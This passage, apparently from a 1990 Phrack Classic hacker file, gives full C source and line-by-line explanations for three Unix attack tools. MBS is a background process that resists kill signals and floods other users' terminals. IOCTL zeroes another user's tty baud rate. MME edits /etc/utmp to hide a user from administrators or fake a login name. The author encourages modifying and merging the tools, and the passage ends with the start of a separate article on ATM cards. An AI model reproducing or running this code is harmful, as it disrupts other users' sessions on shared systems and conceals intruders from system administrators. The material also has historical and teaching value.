  2104.                 if (user.ut_type == USER_PROCESS)
  2105.                 printf("%s is on %s\n",user.ut_name,user.ut_line);
  2106.         }
  2107.         close(handle);
  2108.  
  2109. /* Simple, Right? */
  2110. /* To see anything that is waiting for a login, change USER_PROCESS
  2111. to LOGIN_PROCESS */
  2112. }
  2113.  
  2114. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2115.  
  2116.         In the above program, this is what happens:
  2117.         1.  I assigned the variable "etc" to point at the string
  2118.                 "/etc/utmp", which is the utmp file.
  2119.         2.  I opened in in Read ONLY mode (O_RDONLY).
  2120.         3.  I started a loop that does not end until 0 bytes are
  2121.             read into the user structure.  The 0 bytes would mean
  2122.             end of file.
  2123.  
  2124.         Notice the line:
  2125.         if (user.ut_type == USER_PROCESS)
  2126.  
  2127.         What the above line does is to distinguish between a user
  2128.         and a terminal waiting for a Login.  The ut_type is defined
  2129.         in utmp.h.  There are many types.  One of them is LOGIN_PROCESS.
  2130.         That will be a terminal waiting for a login.  If you wanted to see
  2131.         all the TTYs waiting to be logged in on, you would change the
  2132.         USER_PROCESS to LOGIN_PROCESS.  Other types are things like
  2133.         INIT_PROCESS.  You can just look in utmp.h to see them.
  2134.  
  2135.         Also notice that I have inclide "sys/types.h".  If you do not include
  2136.         this file, there will be an error in utmp.h, and other headers.
  2137.         types.h has definitions for other TYPES of data, etc.  So, if in
  2138.         a header file you encounter a syntax error, you might need to include
  2139.         sys/types.h
  2140.  
  2141.         This program is just a skeleton, although it does print out who
  2142.         is logged on, and to what TTY they are on.  You will see how this
  2143.         skeleton I wrote can be used.  I used it to write MBS.
  2144.  
  2145. _______________________________________________________________________________
  2146.  
  2147.  
  2148. o MBS -- Mass BackSpace virus:
  2149.   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2150.  
  2151.         MBS may not be considered a virus, since it does not replicate
  2152.         itself.  However, it does "infect" every user that logs in, provided
  2153.         the conditions are right.
  2154.  
  2155.         The MBS virus uses the utmp reader to constantly read the utmp
  2156.         file to find its next victim. Thus, eventually getting everyone, then
  2157.         recycling to start again. Therefore catching people who login after
  2158.         it is started.
  2159.  
  2160.         Lets look at the source:
  2161.  
  2162. - - - - - - - - - - - - - - - - - -CUT-HERE- - - - - - - - - - - - - - - - - -
  2163.  
  2164. #include <stdio.h>
  2165. #include <sys/types.h>
  2166. #include <utmp.h>
  2167. #include <fcntl.h>
  2168. #include <signal.h>
  2169. /*
  2170.    MBS - Mass BackSpace Virus!! v2.2 Deluxe+
  2171.    (c) 1990 - Sir Hackalot
  2172.    PhaZeSOFT Ltd.
  2173.  
  2174. */
  2175.  
  2176. char *ent[10][100]; /* This supports 10 immune people change 10 to x for more */
  2177. int maxitem = 5; /* Should be total # of immune dudes */
  2178. int truefalse = 0;
  2179. int warn[10],bad;
  2180. char full_tty[15], text[160],  kstr[80];
  2181. FILE *to_tty, *strm;
  2182. struct utmp u;
  2183.  
  2184.  
  2185. void kmes(fmt,boo)
  2186. char *fmt;
  2187. int boo;
  2188. {
  2189.         if (boo != 0) {
  2190.                 printf("MBS_KERN: ");
  2191.                 printf("%s",fmt);
  2192.         }
  2193.         if (boo == 0) {
  2194.                 sprintf(full_tty,"/dev/%s",u.ut_line);
  2195.                 to_tty = fopen(full_tty,"w");
  2196.                 fprintf(to_tty,"MBS_KERN: %s",fmt);
  2197.                 fclose(to_tty);
  2198.         }
  2199. }
  2200.  
  2201. void initit() {  /* Initialize our little "kernel" */
  2202.         int xxx = 0;
  2203.         strcpy(ent[0],"technic");
  2204.         strcpy(ent[1],"merlin");
  2205.         strcpy(ent[2],"datawiz");
  2206.         strcpy(ent[3],"par");
  2207.         strcpy(ent[4],"Epsilon");
  2208.         while (xxx < 11) {
  2209.                 warn[xxx] = 0;
  2210.                 xxx++;
  2211.         }
  2212.         kmes("Kernel Started.\n",1);
  2213. }
  2214.  
  2215. void warnem(wcnt) /* Notify all the immune people ... */
  2216. int wcnt;
  2217. {
  2218.         if (bad == 0) { /* keep from dumping core to disk */
  2219.                 if (warn[wcnt] < 2) {
  2220.                         sprintf(kstr,"%s has started a backspace virus!\n",getlogin());
  2221.                         kmes(kstr,0);
  2222.                         warn[wcnt]++;
  2223.                 }
  2224.         }
  2225. }
  2226.  
  2227.  
  2228. int checkent(uname) /* Check for immunity */
  2229. char *uname;
  2230. {
  2231.         int cnt = 0;
  2232.         truefalse = 0; /* assume NOT immune */
  2233.         while (cnt < maxitem) {
  2234.                 if (strcmp(uname,ent[cnt]) == 0) { /* if immune... */
  2235.                         truefalse = 1;
  2236.                         warn[cnt]++; /* increment warning variable */
  2237.                         warnem(cnt); /* warn him if we have not */
  2238.                 }
  2239.  
  2240.                 cnt++;
  2241.         }
  2242.         return(truefalse); /* return immunity stat. 1=immune, 0 = not */
  2243. }
  2244.  
  2245.  
  2246. /* Purpose: Instead of just ignoring the signal via SIG_IGN, we want
  2247. to intercept it, and notify use */
  2248. void sig_hand(sig)
  2249. int sig;
  2250. {
  2251. if(sig == 3) kmes("Ignoring Interrupt\n",1);
  2252. if(sig == 15) kmes("Ignoring Termination Signal\n",1);
  2253. if(sig == 4) kmes("Ignoring quit signal.\n",1);
  2254.         }
  2255.  
  2256. main(argc,argv)
  2257. int argc;
  2258. char *argv[];
  2259.  
  2260. {
  2261.         int prio,pid,isg,handle;
  2262.         char buf[80];
  2263.         char name[20],tty[20],time[20];
  2264.         initit();
  2265.         if (argc < 2) prio = 20;
  2266.         if (argc == 2) prio = atoi(argv[1]);
  2267.         if ((pid = fork()) > 0) {
  2268.         printf("Welcome to MBS 2.2 Deluxe, By Sir Hackalot [PHAZE]\n");
  2269.                 printf("Another Fine PhaZeSOFT production\n");
  2270.                 printf("Thanks to The DataWizard for Testing this\n");
  2271.                 printf("Hello to The Conflict\n");
  2272.                 sprintf(kstr,"Created Process %s (%d)\n\n",argv[0],pid);
  2273.                 kmes(kstr,1);
  2274.                 exit(0); /* KILL MOTHER PID, return to Shell & go background */
  2275.         }
  2276.         nice(prio);
  2277.         signal(SIGQUIT,sig_hand);
  2278.         signal(SIGINT,sig_hand);
  2279.         signal(SIGTERM,sig_hand);
  2280.         /* That makes sure you HAVE to do a -9 or -10 to kill this thing.
  2281.            Sometimes, hitting control-c will kill of background processes!
  2282.            Add this line if you want it to continue after you hangup:
  2283.            signal(SIGHUP,SIG_IGN);
  2284. doing it will have the same effect as using NOHUP to
  2285. to execute it. Get it? Nohup = no SIGHUP
  2286. */
  2287.         while(1) {  /* "Kernel" Begins here and never ends */
  2288.                 handle = open("/etc/utmp",O_RDONLY);
  2289.                 while (read(handle,&u,sizeof(u)) != 0) {
  2290.                         bad = 0;
  2291.                         sprintf(full_tty,"/dev/%s",u.ut_line);
  2292.                         if (strcmp(u.ut_name,getlogin()) != 0) {
  2293.  
  2294.          /* Fix: Below is a line that optimizes the hosing/immune process
  2295.             It skips the utmp entry if it is not a user.  If it is, it
  2296.             checks for immunity, then comes back. This is alot faster
  2297.             and does not wear down cpu time/power */
  2298.  
  2299.                if (u.ut_type == USER_PROCESS) isg = checkent(u.ut_name);
  2300.                else isg = 1;
  2301.                  if (isg != 1) {
  2302.                                         if((to_tty = fopen(full_tty,"w")) == NULL)  {
  2303.                                                 bad = 1;
  2304.                                         }
  2305.                                         if (bad == 0) {
  2306.                                                 fprintf (to_tty, "\b\b\b");
  2307.                                                 fflush (to_tty);
  2308.                                         }
  2309.                                         fclose(to_tty);
  2310.                                 }
  2311.                         }
  2312.                 }
  2313.                 close (handle);
  2314.         }
  2315. }
  2316.  
  2317. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2318.  
  2319.         I am going to try to take this bit by bit and explain how it works
  2320.         so that maybe you can come up with some good ideas on creating
  2321.         something similar.
  2322.  
  2323.         I will start with the MAIN function.  Here it is:
  2324.  
  2325. ___
  2326.  
  2327. main(argc,argv)
  2328. int argc;
  2329. char *argv[];
  2330.  
  2331. {
  2332.         int prio,pid,isg,handle;
  2333.         char buf[80];
  2334.         char name[20],tty[20],time[20];
  2335.         initit();
  2336. ___
  2337.  
  2338.         Obviously, this is the part of the code which initializes the main
  2339.         variables used.  The "main(argc,argv)" is there so it can accept
  2340.         command line parameters.  The command line parameters are just
  2341.         for speed customization, which I will discuss later.  Notice how
  2342.         the variables are defined for the command line parameters:
  2343.  
  2344.         int argc, char *argv[];
  2345.  
  2346.         argc is the number of arguments, INCLUDING the name of the current
  2347.         executable running.  argv[] holds the strings in an array which make
  2348.         up the parameters passed.  argv[0] holds the name of the program,
  2349.         while argv[1] holds the 1st parameter entered on the command line.
  2350.         initit() is called to set up the necessary tables.  All of
  2351.         the variables defined at the top of the program are global, and alot
  2352.         of these functions use the global variables, as does initit();.
  2353.  
  2354. ___
  2355.  
  2356. if (argc < 2) prio = 20;
  2357. if (argc == 2) prio = atoi(argv[1]);
  2358. ___
  2359.  
  2360.         Ok, the above two lines essentially parse the command line.
  2361.         The MBS program only accepts ONE argument, which is the priority
  2362.         value to add to the normal process priority.  This is so you
  2363.         can customize how fast MBS runs.  If you want to burn CPU time,
  2364.         you would invoke mbs by:
  2365.         $ mbs 0
  2366.  
  2367.         That would make the priority as fast as the current can run something.
  2368.         MBS's default priority setting is 20, so that CPU time will be saved.
  2369.         MBS is very fast however, and since alot of Unix systems like to
  2370.         cache alot of frequently used data from disks, it gets fast after
  2371.         it reads utmp a few times, since utmp will be cached until it changes.
  2372.         However, you can run MBS with a number from 0-19, the higher the
  2373.         number, the "less" priority it will have with the cpu.
  2374.  
  2375.  
  2376. ___
  2377.  
  2378. if ((pid = fork()) > 0) {
  2379.   printf("Welcome to MBS 2.2 Deluxe, By Sir Hackalot [PHAZE]\n");
  2380.   printf("Another Fine PhaZeSOFT production\n");
  2381.   sprintf(kstr,"Created Process %s (%d)\n\n",argv[0],pid);
  2382.   kmes(kstr,1);
  2383.   exit(0); /* KILL MOTHER PID, return to Shell & go background */
  2384. }
  2385.  
  2386. ___
  2387.  
  2388.         The above is what sends MBS into the background.  It calls fork(),
  2389.         which creates another process off the old one.  However, fork()
  2390.         can be considered "cloning" a process, since it will use anything
  2391.         beneath it.  So, now you can assume there are TWO copies of MBS
  2392.         running -- One in the foreground, and one in the background.  However,
  2393.         you may notice the exit(0).  That first exit kills off the parent.
  2394.         a second call to exit() would kill the child as well.  notice the
  2395.         call to "kmes".  kmes is just a function that is defined earlier,
  2396.         which I will discuss later.
  2397. ___
  2398.  
  2399. nice(prio);
  2400. signal(SIGQUIT,sig_hand);
  2401. signal(SIGINT,sig_hand);
  2402. signal(SIGTERM,sig_hand);
  2403. /*   signal(SIGHUP,SIG_IGN); */
  2404. ___
  2405.  
  2406.         The above code is integral for the survival of the MBS program in
  2407.         memory.  The nice(prio) is what sets the new priority determined
  2408.         by the command line parsing.
  2409.  
  2410.         The signal() statements are basically what keeps MBS running.  What
  2411.         it does is catch INTERRUPTS, Quits, and a regular call to KILL.
  2412.         the commented out portion would ignore requests to kill upon hangup.
  2413.         This would keep MBS in the background after you logged off.
  2414.  
  2415.         Why do this?  Well, remember that the parent was affected by
  2416.         its environment?  Well, the new forked process is too.  That means,
  2417.         if you were 'cat'ting a file, and hit control-C to stop it, the
  2418.         cat process would stop, but push the signal on to MBS, which would
  2419.         cause MBS to exit, if it did not have a signal handler.  The signal
  2420.         calls setup signal handlers.  What they do is tell the program
  2421.         to goto the function sig_hand() when one of the 3 signals is
  2422.         encountered.  The commented signal just tells the program to ignore
  2423.         the hangup signal.  The sig_hand argument can be replaced with
  2424.         SIG_IGN if you just want to plain ignore the signal and not handle it.
  2425.  
  2426.         The SIGQUIT is sometimes the control-D character.  That is why it
  2427.         also must be dealt with.  If the signals aren't ignored or caught,
  2428.         MBS can easily kicked out of memory by YOU, by accident of course.
  2429.  
  2430. ___
  2431.  
  2432. while(1) {  /* "Kernel" Begins here and never ends */
  2433.      handle = open("/etc/utmp",O_RDONLY);
  2434. ___
  2435.  
  2436.         The above starts the main loop.  The begining of the loop is to open
  2437.         the utmp file.
  2438.  
  2439. ___
  2440.  
  2441.  while (read(handle,&u,sizeof(u)) != 0) {
  2442.       bad = 0;
  2443.       sprintf(full_tty,"/dev/%s",u.ut_line);
  2444.       if (strcmp(u.ut_name,getlogin()) != 0) {
  2445.         if (u.ut_type == USER_PROCESS) isg = checkent(u.ut_name);
  2446.            else isg = 1;
  2447.         if (isg != 1) {
  2448.            if((to_tty = fopen(full_tty,"w")) == NULL)  {
  2449.               bad = 1;
  2450.               }
  2451.            if (bad == 0) {
  2452.               fprintf (to_tty, "\b\b\b");
  2453.               fflush (to_tty);
  2454.               }
  2455.               fclose(to_tty);
  2456.         }
  2457.     }
  2458. ___
  2459.  
  2460.  
  2461.         Above is the sub_main loop.  what it does is go through the utmp
  2462.         file, and on each entry, it prepares a path name to the TTY
  2463.         of the current utmp entry (sprintf(fulltty...)).  Then it checks
  2464.         to see if it is YOU.  If it is, the loop ends.  If it is not, then
  2465.         it sees if it is a User.   If not, it ends the loop and goes to
  2466.         the next.
  2467.  
  2468.         If it is a user, it goes to checkent to see if that user has been
  2469.         declared immune in the immunity tables (down below later..).
  2470.         If the idiot is not immune, it attempts to open their tty.  If it
  2471.         cannot, it sets the bad flag, then ends the loop.  If it can be
  2472.         written to, it sends three backspaces, according to YOUR tty specs.
  2473.         Then, it closes the opened tty, and the loop continues until the end.
  2474.  
  2475. ___
  2476.  
  2477.        }
  2478. close (handle);
  2479.     }
  2480. }
  2481.  
  2482. ___
  2483.  
  2484.         The above is the end of the main loop.  It closes handle (utmp) so
  2485.         it can be reopened at the start of the loop at the beginning of the
  2486.         file.  The reason to not create a table of people to hit in memory
  2487.         after one reading is so that MBS will stop after people logoff, and
  2488.         to start when new ones logon.  The constant reading of the utmp
  2489.         file makes sure everyone gets hit, except immune people.  Also,
  2490.         the file must be closed before reopening, or else, after a few opens,
  2491.         things will go to hell.
  2492.  
  2493.  
  2494. Here is the signal handler:
  2495.  
  2496. ___
  2497.  
  2498. void sig_hand(sig)
  2499. int sig;
  2500. {
  2501. if(sig == 3) kmes("Ignoring Interrupt\n",1);
  2502. if(sig == 15) kmes("Ignoring Termination Signal\n",1);
  2503. if(sig == 4) kmes("Ignoring quit signal.\n",1);
  2504.         }
  2505. ___
  2506.  
  2507.         It is very simple.  when a signal is caught and sent to the handler,
  2508.         the library function SIGNAL sends the signal number as an argument
  2509.         to the function.  The ones handled here are 3,4, and 15.  But
  2510.         this was just for effect.  You could just have it print one line
  2511.         no matter what the signal was, or just rip this function out and
  2512.         put in SIG_IGN in the signal calls.
  2513.  
  2514.         Below is the immunity check:
  2515. ___
  2516.  
  2517. int checkent(uname) /* Check for immunity */
  2518. char *uname;
  2519. {
  2520.         int cnt = 0;
  2521.         truefalse = 0; /* assume NOT immune */
  2522.         while (cnt < maxitem) {
  2523.                 if (strcmp(uname,ent[cnt]) == 0) { /* if immune... */
  2524.                         truefalse = 1;
  2525.                         warn[cnt]++; /* increment warning variable */
  2526.                         warnem(cnt); /* warn him if we have not */
  2527.                 }
  2528.  
  2529.                 cnt++;
  2530.         }
  2531.         return(truefalse); /* return immunity stat. 1=immune, 0 = not */
  2532. }
  2533.  
  2534. ___
  2535.  
  2536.         Above, you see variables used that are not defined.  They are
  2537.         just variables that were declared as globals at the begining.
  2538.         What this does is just compare the login name sent to it with
  2539.         every name in the immunity table.  If it finds the name on
  2540.         the table matches, it will go and see if it should warn the
  2541.         user.  Also, the warn count is incremented so that the warning
  2542.         function will know if the user has been warned.
  2543.  
  2544.         Here is the warning function:
  2545.  
  2546. ___
  2547.  
  2548. void warnem(wcnt) /* Notify all the immune people ... */
  2549. int wcnt;
  2550. {
  2551.         if (bad == 0) { /* keep from dumping core to disk */
  2552.                 if (warn[wcnt] < 2) {
  2553.                         sprintf(kstr,"%s has started a backspace virus!\n",getlogin());
  2554.                         kmes(kstr,0);
  2555.                         warn[wcnt]++;
  2556.                 }
  2557.         }
  2558. }
  2559. ___
  2560.  
  2561.         What this does is take the position number of the table entry and
  2562.         checks and see if that entry has been warned before.  It decides
  2563.         this by checking its value.  If it is less than two, that means
  2564.         the user had not been warned.  After it is sent, the function
  2565.         incrememnts the warning flag so that they will never been warned
  2566.         again until the program has stopped & restarted or someone else
  2567.         runs one.  The "if (bad == 0)" is there so that it only warns a
  2568.         person if it can write to the tty.
  2569.  
  2570.         Here is the kmes function you keep seeing:
  2571.  
  2572. ___
  2573.  
  2574. void kmes(fmt,boo)
  2575. char *fmt;
  2576. int boo;
  2577. {
  2578.         if (boo != 0) {
  2579.                 printf("MBS_KERN: ");
  2580.                 printf("%s",fmt);
  2581.         }
  2582.         if (boo == 0) {
  2583.                 sprintf(full_tty,"/dev/%s",u.ut_line);
  2584.                 to_tty = fopen(full_tty,"w");
  2585.                 fprintf(to_tty,"MBS_KERN: %s",fmt);
  2586.                 fclose(to_tty);
  2587.         }
  2588. }
  2589. ___
  2590.         All this is, is a fancy printf which prints a string with
  2591.         "MBS_KERN:" stuck on the front of it.  the BOO variable is just
  2592.         so it can determine whether or not to send it to the local
  2593.         screen or to another tty.  It is just for looks.
  2594.  
  2595.         Now, finally, we can look at the initializer:
  2596.  
  2597. ___
  2598.  
  2599. void initit() {  /* Initialize our little "kernel" */
  2600.         int xxx = 0;
  2601.         strcpy(ent[0],"sirh");
  2602.         strcpy(ent[1],"merlin");
  2603.         strcpy(ent[2],"datawiz");
  2604.         strcpy(ent[3],"par");
  2605.         strcpy(ent[4],"epsilon");
  2606.         while (xxx < 11) {
  2607.                 warn[xxx] = 0;
  2608.                 xxx++;
  2609.         }
  2610.         kmes("Kernel Started.\n",1);
  2611. }
  2612. ___
  2613.  
  2614.         This is a very SIMPLE procedure.  It just fills the list
  2615.         with the people to keep immune.  ent[..][..] is what holds
  2616.         the immune list.  It also zeros out the warning flags associated
  2617.         with each user.  ("sirh","merlin","par",etc. are acct. names)
  2618.  
  2619.         This "virus" can do more than just send backspaces if you want it
  2620.         to, but it will take modification.  Some people have modified
  2621.         it to include the next program, which is ioctl.c.
  2622.  
  2623. _______________________________________________________________________________
  2624.  
  2625.  
  2626.  
  2627. o IOCTL -- Set another's tty w/out read perms
  2628.   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2629.  
  2630.         The program ioctl is very very nice.  What it does is basically
  2631.         act like stty, but you don't have to use the < to change
  2632.         someone else's terminal.  Here is the listing:
  2633.  
  2634. - - - - - - - - - - - - - - - - - -CUT-HERE- - - - - - - - - - - - - - - - - -
  2635.  
  2636. #include <stdio.h>
  2637. #include <sys/types.h>
  2638. #include <fcntl.h>
  2639. #include <sgtty.h>
  2640. #define TIOC ('T'<<8)
  2641. #define TCSETA (TIOC|2)
  2642.  
  2643. main(argc,argv)
  2644. int argc;
  2645. char *argv[];
  2646. {
  2647.         int x;
  2648.         struct sgttyb histty;
  2649.         if (argc == 1) exit(0);
  2650.         x = open(argv[1],O_WRONLY);
  2651.         if (x == -1) exit(0);
  2652.         histty.sg_ispeed = B0;
  2653.         histty.sg_ospeed = B0;
  2654.         ioctl(x,TCSETA,&histty);
  2655. }
  2656.  
  2657. - - - - - - - - - - - - - - - - - -CUT-HERE- - - - - - - - - - - - - - - - - -
  2658.  
  2659.         The basis of the program is that you give a full path to the tty
  2660.         to nail.  You need to be able to write to the tty for it to work.
  2661.  
  2662.         Notice the two defines.  They are in there so you do not have
  2663.         to include termio.h, and hence get 200 warnings of redefinition.
  2664.         This program is WAY simpler than MBS, but here is how it works:
  2665.  
  2666. ___
  2667.  
  2668. main(argc,argv)
  2669. int argc;
  2670. char *argv[];
  2671. ___
  2672.  
  2673.         Of course, the above sets up the program to get command line
  2674.         arguments.
  2675.  
  2676. ___
  2677.  
  2678.         int x;
  2679.         struct sgttyb histty;
  2680. ___
  2681.  
  2682.         These are the variables.  the sgttyb structure is what the ioctl
  2683.         function call needs to do its duty.  You can do a lot to a tty
  2684.         using the structure, but this program only does 2 things to the
  2685.         tty, as you shall soon see.  Remember that the programs here can
  2686.         be modified, especially this one.  Just check out sgtty.h to
  2687.         see the modes you can pop a tty into.
  2688.  
  2689. ___
  2690.  
  2691.         if (argc == 1) exit(0);
  2692.         x = open(argv[1],O_WRONLY);
  2693.         if (x == -1) exit(0);
  2694. ___
  2695.  
  2696.         The above three lines are the open/error checks.  The 1st line
  2697.         says that if the idiot did not give an argument then exit
  2698.         the program.  The argument needs to be the path to the
  2699.         device driver (/dev/tty...).
  2700.         The second line opens the tty for writing, and the third exits
  2701.         upon error.
  2702.  
  2703. ___
  2704.  
  2705.         histty.sg_ispeed = B0;
  2706.         histty.sg_ospeed = B0;
  2707.         ioctl(x,TCSETA,&histty);
  2708. ___
  2709.  
  2710.         The above three lines are the meat of the program.  What they
  2711.         do is this:
  2712.  
  2713.         Line 1 sets the input speed to 0 for the tty into the structure.
  2714.         line 2 sets the output speed to 0 for the tty into the structure.
  2715.         line 3 sets the tty according to the structure histty.
  2716.  
  2717.         That is why if you look into the components of the structure, you can
  2718.         do things, such as convert all output to uppercase for them,
  2719.         set a higher baud, redefine CR mapping, redefine tabs, and
  2720.         all sorts of things.
  2721.  
  2722. _______________________________________________________________________________
  2723.  
  2724.  
  2725. o MME - Make ME!:
  2726.   ~~~~~~~~~~~~~~~
  2727.         MME is just a program which changes utmp for you, in order to hide
  2728.         you, or just mess with other user's minds.  This is a different
  2729.         version then the one I originally put out.  In this version,
  2730.         I removed the code that lets you change your tty.  It just became
  2731.         too dangerous to change your tty.
  2732.  
  2733.         Here is the listing:
  2734.  
  2735. - - - - - - - - - - - - - - - - - -CUT-HERE- - - - - - - - - - - - - - - - - -
  2736.  
  2737. #include <stdio.h>
  2738. #include <fcntl.h>
  2739. #include <sys/types.h>
  2740. #include <utmp.h>
  2741. #include <sys/stat.h>
  2742.  
  2743. char *mytty; /* For an exact match of ut_line */
  2744. char *backup_utmp = "cp /etc/utmp /tmp/utmp.bak";
  2745. struct utmp *user;
  2746.  
  2747. main(argc,argv)
  2748. int argc;
  2749. char *argv[];
  2750. {
  2751.         int good= 0,cnt = 0,start = 1, index = 0;
  2752.         char err[80];
  2753.         system(backup_utmp);
  2754.     printf("Welcome to MME 1.00 By Sir Hackalot\n");
  2755.     printf("Another PHAZESOFT Production\n");
  2756.     printf("Status:");
  2757.     if (argc == 2) printf("Changing your login to %s\n",argv[1]);
  2758.         if (argc == 1) printf("Removing you from utmp\n");
  2759.  
  2760.         utmpname("/etc/utmp");
  2761.         mytty = strrchr(ttyname(0),'/'); /* Goto the last "/" */
  2762.         strcpy(mytty,++mytty); /* Make a string starting one pos greater */
  2763.         while (good != 1) {
  2764.                 user = getutent();
  2765.                 cnt++;
  2766.                 if (strcmp(user->ut_line,mytty) == 0) good =1;
  2767.         }
  2768.         utmpname("/etc/utmp"); /* Reset file pointer */
  2769.         for(start = 0;start < cnt;start++) {
  2770.                 user = getutent(); /* Move the file pointer to where we are */
  2771.         }
  2772.  
  2773.  
  2774.     if (argc == 1) {
  2775.      user->ut_type = LOGIN_PROCESS;
  2776.          strcpy(user->ut_name,"LOGIN");
  2777.                    }
  2778.     else user->ut_type = USER_PROCESS;
  2779.  
  2780.         if (argc == 2) strcpy(user->ut_name,argv[1]);
  2781.         pututline(user); /* Rewrite our new info */
  2782.         endutent(); /* Tell the utmp functions we are through */
  2783.         printf("Delete /tmp/utmp.bak if all is well.\n");
  2784.         printf("Else, copy it to /etc/utmp.\n");
  2785. }
  2786.  
  2787. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2788.  
  2789.  
  2790.         Well, of course, we will take this bit by bit.
  2791.         Lets start with the standard ole function:
  2792.  
  2793. ___
  2794.  
  2795. main(argc,argv)
  2796. int argc;
  2797. char *argv[];
  2798. ___
  2799.  
  2800.         This again sets up main so we can accept command line arguments.
  2801.  
  2802. ___
  2803.  
  2804. char *mytty; /* For an exact match of ut_line */
  2805. char *backup_utmp = "cp /etc/utmp /tmp/utmp.bak";
  2806. struct utmp *user;
  2807. ___
  2808.  
  2809.         These are just global variables.
  2810.         Backup_utmp is the command we will issue to shell for a failsafe
  2811.         mechanism.
  2812.  
  2813. ___
  2814.  
  2815.            system(backup_utmp);
  2816.     printf("Welcome to MME 1.00 By Sir Hackalot\n");
  2817.     printf("Another PHAZESOFT Production\n");
  2818.     printf("Status:");
  2819.     if (argc >= 2) printf("Changing your login to %s\n",argv[1]);
  2820.         if (argc == 1) printf("Removing you from utmp\n");
  2821. ___
  2822.  
  2823.         The above is not hard to figure out.  First, this uses the system
  2824.         command to load shell, and execute our backup command.
  2825.         Then, the lame credits are printed.  Then, it tells you what it
  2826.         is going to do based on the number of arguments passed from the
  2827.         command line.
  2828.         If no arguments are given (argc==1) then remove us from utmp.
  2829.         If there are 1 or more (arc>=2) then change the login name.
  2830.  
  2831. ___
  2832.  
  2833. utmpname("/etc/utmp");
  2834.         mytty = strrchr(ttyname(0),'/'); /* Goto the last "/" */
  2835.         strcpy(mytty,++mytty); /* Make a string starting one pos greater */
  2836. ___
  2837.  
  2838.         The above code does the following:  utmpname is a system function
  2839.         common to UNIX system V, XENIX system V, etc.  It is part of the
  2840.         utmp reading library.  It sets the thing to be read when the
  2841.         other system calls are made (getutent, etc..).
  2842.         mytty is set to hold one's tty.  It has to break down the result
  2843.         of ttyname(0) to get a ttyname without a path.
  2844.  
  2845. ___
  2846.  
  2847. while (good != 1) {
  2848.                 user = getutent();
  2849.                 cnt++;
  2850.                 if (strcmp(user->ut_line,mytty) == 0) good =1;
  2851.         }
  2852. ___
  2853.  
  2854.  
  2855.         This code gets your relative index from utmp and stores it into
  2856.         cnt.
  2857.  
  2858. ___
  2859.  
  2860. utmpname("/etc/utmp"); /* Reset file pointer */
  2861.         for(start = 0;start < cnt;start++) {
  2862.                 user = getutent(); /* Move the file pointer to where we are */
  2863.         }
  2864. ___
  2865.  
  2866.         The above resets the file pointer used by the system calls, then
  2867.         moves to your entry.
  2868.  
  2869. ___
  2870.  
  2871. if (argc == 1) {
  2872.      user->ut_type = LOGIN_PROCESS;
  2873.          strcpy(user->ut_name,"LOGIN");
  2874.                    }
  2875.     else user->ut_type = USER_PROCESS;
  2876.  
  2877.         if (argc == 2) strcpy(user->ut_name,argv[1]);
  2878.         pututline(user); /* Rewrite our new info */
  2879.         endutent(); /* Tell the utmp functions we are through */
  2880. ___
  2881.  
  2882.         The above is very simple as well.  If you are removing yourself
  2883.         from utmp, it will change your process type to LOGIN_PROCESS
  2884.         so that when someone does a "who", you are not there.
  2885.         It changes your login name to LOGIN so if some knowitall
  2886.         system admin does a who -l, he wont see you.  See, who -l shows
  2887.         ttys waiting for login.  SO, if i did not change your tty name,
  2888.         we would see:
  2889.  
  2890.         $ who -l
  2891.         LOGIN           ttyxx1
  2892.         LOGIN           tty002
  2893.         joehack         tty003
  2894.         LOGIN           tty004
  2895.  
  2896.         See the problem there?  That is why your name needs to be
  2897.         changed to LOGIN.
  2898.         If you are changing your login name, the "else" statment kicks
  2899.         in and makes SURE you WILL show up in utmp, in case you had
  2900.         removed yourself before.
  2901.         Then, it takes the command line argument, and places it as your
  2902.         login name in utmp.
  2903.         pututline(user) then writes the info into the record where the
  2904.         file pointer is... and that is your record.  It puts the contents
  2905.         of the things in the "user" structure into the file.  then, endutent
  2906.         closes the file.
  2907.  
  2908.         Now, here is an example of using the file:
  2909.  
  2910.         # mme Gh0d
  2911.  
  2912.         that would change your login name to Gh0d in utmp.
  2913.  
  2914.         # mme
  2915.  
  2916.         that would remove you from sight.  Remember!!: You need write perms
  2917.         to utmp for this to work.  You CAN test this program by changing
  2918.         the filename in the function "utmpname" to somewhere else, say in
  2919.         /tmp.  You could copy /etc/utmp to /tmp/utmp, and test it there.
  2920.         Then, you could use "who" to read the file in /tmp to show the
  2921.         results.
  2922.  
  2923. _______________________________________________________________________________
  2924.  
  2925.  
  2926. o In Conclusion:
  2927.   ~~~~~~~~~~~~~~
  2928.  
  2929.         These are just some of the programs I decided to put in this file.
  2930.         I have a lot more, but I decided I would keep them for later
  2931.         issues, and leave these two together since they can
  2932.         be easily related.  One person took MBS, and ioctl, and mended
  2933.         them together to make a program that sets everyone's baud
  2934.         rate to zero instead of sending 3 backspaces.  They just put
  2935.         in the above lines of code into the place where they sent
  2936.         the backspaces, and used open instead of stream open (fopen).
  2937.         It is very simple to mend these two things together.
  2938.  
  2939.         Have a nice life!  Keep on programmin'!
  2940.  
  2941.         By: Sir Hackalot of Phaze.
  2942. _______________________________________________________________________________
  2943.  
  2944.                               ==Phrack Classic==
  2945.  
  2946.                      Volume Three, Issue 32, File #6 of 12
  2947.  
  2948.                      +----------------------------------+
  2949.                      ]          Exploration of:         ]
  2950.                      ]  Automatic Teller Machine Cards  ]
  2951.                      ]                                  ]
  2952.                      +----+-------------------------+---+
  2953.                           ]       Written by:       ]
  2954.                           ]      Jester Sluggo      ]
  2955.                           ]                         ]
  2956.                           ] Released: May 13, 1989  ]
  2957.                           ](to Black-Ice:For Review)]
  2958.                           ] Released: Jan 12, 1990  ]
  2959.                           ]    (to Phrack Inc.)     ]
  2960.                           ] Released: Nov, 10, 1990 ]
  2961.                           ]   (to Phrack Classic)   ]
  2962.                           +-------------------------+
  2963.  
  2964.  
  2965. With the North American continent the being the worlds biggest
  2966. consumer of goods and services liquidity of the banking system  has
  2967. become an important factor in our everyday lives.  Savings accounts
  2968. were used by people to keep money safe and used by the banks to
  2969. provide money for loans.  However, due to 'Bankers Hours' (10 AM to
  2970. 3 PM) it was often difficult for people to get access to thier
  2971. money when they needed it.
  2972.  
  2973. The banking system then created the Checking Account system.  This
  2974. system allowed people to have much easier access to thier money.
